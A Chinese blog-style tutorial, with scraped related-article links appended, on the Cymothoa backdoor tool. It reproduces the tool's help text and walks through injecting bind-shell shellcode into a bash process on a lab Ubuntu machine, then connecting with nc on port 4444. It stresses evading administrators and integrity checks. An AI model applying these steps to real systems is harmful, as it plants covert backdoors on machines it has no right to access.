Cymothoa是一款隐秘的后门工具。

发现网上对于Cymothoa的文章并不是很多,可是Cymothoa又是一款非常强大的后门工具,这里记录下Cymothoa的使用笔记。

Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。

首先查看程序PID linux为ps -aux windows为tasklist

来看一下Cymothoa的参数选项:

                               _

                           _  | |

   ____ _   _ ____   ___ _| |_| |__   ___  _____

  / ___) | | |    \ / _ (_   _)  _ \ / _ \(____ |

 ( (___| |_| | | | | |_| || |_| | | | |_| / ___ |

  \____)\__  |_|_|_|\___/  \__)_| |_|\___/\_____|

       (____/

 Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...

 By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)

 from ES-Malaria by ElectronicSouls (http://www.0x4553.org).

 Usage:

     cymothoa -p <pid> -s <shellcode_number> [options]

 Main options:

     -p    process pid

     -s    shellcode number

     -l    memory region name for shellcode injection (default /lib/ld)

           search for "r-xp" permissions, see /proc/pid/maps...

     -m    memory region name for persistent memory (default /lib/ld)

           search for "rw-p" permissions, see /proc/pid/maps...

     -h    print this help screen

     -S    list available shellcodes

 Injection options (overwrite payload flags):

     -f    fork parent process

     -F    don't fork parent process

     -b    create payload thread (probably you need also -F)

     -B    don't create payload thread

     -w    pass persistent memory address

     -W    don't pass persistent memory address

     -a    use alarm scheduler

     -A    don't use alarm scheduler

     -t    use setitimer scheduler

     -T    don't use setitimer scheduler

 Payload arguments:

     -j    set timer (seconds)

     -k    set timer (microseconds)

     -x    set the IP

     -y    set the port number

     -r    set the port number 2

     -z    set the username (4 bytes)

     -o    set the password (8 bytes)

     -c    set the script code (ex: "#!/bin/sh\nls; exit 0")

           escape codes will not be interpreted...

ok 在例子之前看下Cymothoa工具在kali的位置:

也可以去https://sourceforge.net/projects/cymothoa/?stars=3 下载

在实战中你需要对目标机上传编译好的Cymothoa 进行后门注入。

例子中对kali下的Cymothoa打包 然后再Ubuntu18上进行运行。

===========================================================================================

攻击机kali上打包:

tar -cf cymothoa.tar cymothoa/

靶机Ubuntu18上解压:

tar xf  cymothoa.tar

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

注入bash进程植入Cymothoa后门:

首先来看看最常用的-S 查看shellcode:

-s指定使用的shellcode -p指定注入的进程的pid -y指定payload的服务端口

也可以查看bash进程

ps a|grep /bin/bash

查看进程id,一般来说都会选择bash的进程,选择这个pid为2211的bash进程

./cymothoa -s 0 -p 2211 -y 4444

注入成功以后 用nc之类的工具连接这个端口(例子中为4444)即可访问后门。

Cymothoa后门工具的更多相关文章

  1. 进程注入后门工具Cymothoa

    进程注入后门工具Cymothoa   Cymothoa是一款隐秘的后门工具.它通过向目标主机活跃的进程注入恶意代码,从而获取和原进程相同的权限.该工具最大的优点就是不创建新的进程,不容易被发现.由于该 ...

  2. Kali Linux Web后门工具、Windows操作系统痕迹清除方法

    Kali Linux Web后门工具 Kali的web后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCoo(Web Backdoor Cookie) WeBaCoo是一款隐蔽的脚 ...

  3. Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter

    注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo.weevely.PHP Meterpreter,这类工 ...

  4. Kali Linux之常见后门工具介绍

    1.Meterpreter 它是Metasploit框架中功能强大的后渗透模块.可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端. 命令 作用 ...

  5. JSP文件管理后门工具jsp-file-browser

    JSP文件管理后门工具jsp-file-browser   在网页后门中,快速浏览服务器文件非常重要.为此,Kali Linux新增了一款JSP后门工具jsp-file-browser.该工具提供所有 ...

  6. Web后门工具WeBaCoo

    Web后门工具WeBaCoo   WeBaCoo是使用Perl语言编写的Web后门工具.渗透测试人员首先使用该工具生成一个后门PHP页面.然后,将该页面上传到目标服务器上.最后,在本地终端直接访问该页 ...

  7. 网页后门工具laudanum

     网页后门工具laudanum laudanum是Kali Linux预先安装的Web Shell工具.它支持多种Web后台技术,如ASP.ASP.net .JSP.PHP.Coldfusion.它提 ...

  8. 后门工具dbd

    后门工具dbd   dbd功能类似于Netcat,但提供强大的加密功能,支持AES-CBC-128和HMAC-SHA1加密.该工具可以运行在类Unix和Windows系统中.渗透测试人员首先使用该工具 ...

  9. rootkit后门检查工具RKHunter

    ---恢复内容开始--- rkhunter简介: 中文名叫"Rootkit猎手", rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检 ...

随机推荐

  1. 这可能是国内最全面的char RNN注释

    char RNN代码来源于https://github.com/hzy46/Char-RNN-TensorFlow 前言 本人在学习char RNN的过程中,遇到了很多的问题,但是依然选择一行代码一行 ...

  2. JSP官方文档(JavaServer Pages Specification)下载

    找了好久,终于找到官网的下载地址了.这样,就可以用一手的文档资料了! 下载地址:http://download.oracle.com/otndocs/jcp/jsp-2_3-mrel2-spec/ s ...

  3. Oracle SQL调优之绑定变量用法简介

    目录 一.SQL执行过程简介 二.绑定变量典型用法 2.1.在SQL中绑定变量 2.2.在PL/SQL中使用绑定变量 2.3.PL/SQL批量绑定变量 2.4.Java代码里使用绑定变量 最近在看&l ...

  4. 使用Bookinfo应用测试Kuma服务网格

    最近,开源API管理平台Kong服务供应商近日放出了新的开源项目Kuma.本文尝试将 bookinfo 应用部署在 Kuma 网格中,以便帮助大家更好的理解 Kuma 项目.   Kuma是能用于管理 ...

  5. 右键没有新建word选项

    两类解决办法 一. 1. 新建一个txt文本,并插入如下内容: Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.doc] @=&quo ...

  6. [AWS] 02 - Pipeline on EMR

    Data Analysis with EMR. Video demo: Run Spark Application(Scala) on Amazon EMR (Elastic MapReduce) c ...

  7. Unity-遇到的问题小总结

    1. event trigger后面显示不了对应的方法 原因:我是直接把脚本拖拽进去的,这是没有实例化的,拖拽进去的应该是挂载这个脚本的GameObject就可以了 2.制作prefeb 将场景中的单 ...

  8. 2018年蓝桥杯java b组第三题

    标题:复数幂 设i为虚数单位.对于任意正整数n,(2+3i)^n 的实部和虚部都是整数.求 (2+3i)^123456 等于多少? 即(2+3i)的123456次幂,这个数字很大,要求精确表示. 答案 ...

  9. JAVASE知识点总结(二)

    第十三章:多态  一.instanceof 判断一个类是否是指定的类 真则返回true 假则返回false.  二.字段没有多态,只有方法有多态,字段前面是的什么类型,字段就调用谁的,在编译时就已经确 ...

  10. Android Studio [真机测试/开发者模式]

    一.手机设置 首先根据自己的手机型号百度打开开发者模式, 我的是vivo,设置--->更多设置-->关于手机-->软件版本号连续点击会提示开启开发者模式. 并在开发者选项里打开USB ...